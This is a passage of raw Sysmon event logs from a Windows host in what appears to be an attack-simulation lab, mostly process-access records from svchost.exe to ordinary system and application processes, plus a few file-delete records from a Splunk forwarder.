STEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292477Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.510{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292476Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.494{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF586999B10CF10A3BE0F244767B0EA1,SHA256=9F569D5F985A62C58A159E1CBEA7FDB99C66D97B6EFF2E6A5BA32FC2CB279E1C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292475Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.460{BEA10069-276A-6087-1610-00000000BB01}26406024C:\Program Files\Mozilla Firefox\firefox.exe{BEA10069-276C-6087-1810-00000000BB01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3f4e31|C:\Program Files\Mozilla Firefox\xul.dll+11f80f1|C:\Program Files\Mozilla Firefox\xul.dll+1229bc9|C:\Program Files\Mozilla Firefox\xul.dll+1229ae9|C:\Program Files\Mozilla Firefox\xul.dll+12271ed|C:\Program Files\Mozilla Firefox\xul.dll+1227694|C:\Program Files\Mozilla Firefox\xul.dll+16cb5a1|C:\Program Files\Mozilla Firefox\xul.dll+687059|C:\Program Files\Mozilla Firefox\xul.dll+686f64|C:\Program Files\Mozilla Firefox\xul.dll+686d4d|C:\Program Files\Mozilla Firefox\xul.dll+686984|C:\Program Files\Mozilla Firefox\xul.dll+3020711|C:\Program Files\Mozilla Firefox\xul.dll+3020219|C:\Program Files\Mozilla Firefox\xul.dll+3023f17|C:\Program Files\Mozilla Firefox\xul.dll+302608f|C:\Program Files\Mozilla Firefox\xul.dll+676346|C:\Program Files\Mozilla Firefox\xul.dll+64dedc|C:\Program Files\Mozilla Firefox\xul.dll+644b48|C:\Program Files\Mozilla Firefox\xul.dll+2c29de1|C:\Program Files\Mozilla Firefox\xul.dll+2c29190|C:\Program Files\Mozilla Firefox\xul.dll+623991|C:\Program Files\Mozilla Firefox\xul.dll+2ddeebe 10341000x8000000000000000292474Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0D2A-00000000BB01}3684C:\Windows\system32\atbroker.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292473Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0C2A-00000000BB01}7148C:\Windows\System32\rdpclip.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292472Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0B2A-00000000BB01}5240C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292471Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0A2A-00000000BB01}3780C:\Windows\servicing\TrustedInstaller.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292470Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-092A-00000000BB01}6536C:\Windows\system32\TSTheme.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292469Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292468Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-2777-6087-1E10-00000000BB01}6080C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292467Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276D-6087-1C10-00000000BB01}4292C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292466Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276D-6087-1B10-00000000BB01}720C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292465Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276C-6087-1A10-00000000BB01}2956C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292464Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276C-6087-1910-00000000BB01}3764C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292463Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276C-6087-1810-00000000BB01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292462Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276A-6087-1610-00000000BB01}2640C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292461Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292460Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-187E-6087-4F0E-00000000BB01}3388C:\Windows\SysWOW64\rundll32.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292459Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-1489-6087-C80D-00000000BB01}4152C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292458Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACBD9B83FAE11905E1C8FF7D0C62F336,SHA256=0B245A581E2DF0C54E0FA04C4DE6ECAC3BC6C3F5129DD758D6E6B3F940F27741,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292457Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-1489-6087-C70D-00000000BB01}4324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292456Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D72A-6086-3603-00000000BB01}2104C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292455Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D70A-6086-0C03-00000000BB01}2612C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292454Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D70A-6086-0B03-00000000BB01}2492C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292453Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D6F7-6086-F002-00000000BB01}1196C:\Windows\system32\fontdrvhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292452Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D5E0-6086-A001-00000000BB01}5912C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292451Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D5DD-6086-9E01-00000000BB01}5524C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292450Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4B6-6086-6501-00000000BB01}4240C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292449Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292448Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292447Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4F01-00000000BB01}2856C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292446Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292445Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AC-6086-4701-00000000BB01}3580C:\Windows\system32\dwm.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292444Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AB-6086-4401-00000000BB01}3848C:\Windows\system32\winlogon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292443Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D14B-6086-D000-00000000BB01}3836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292442Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program 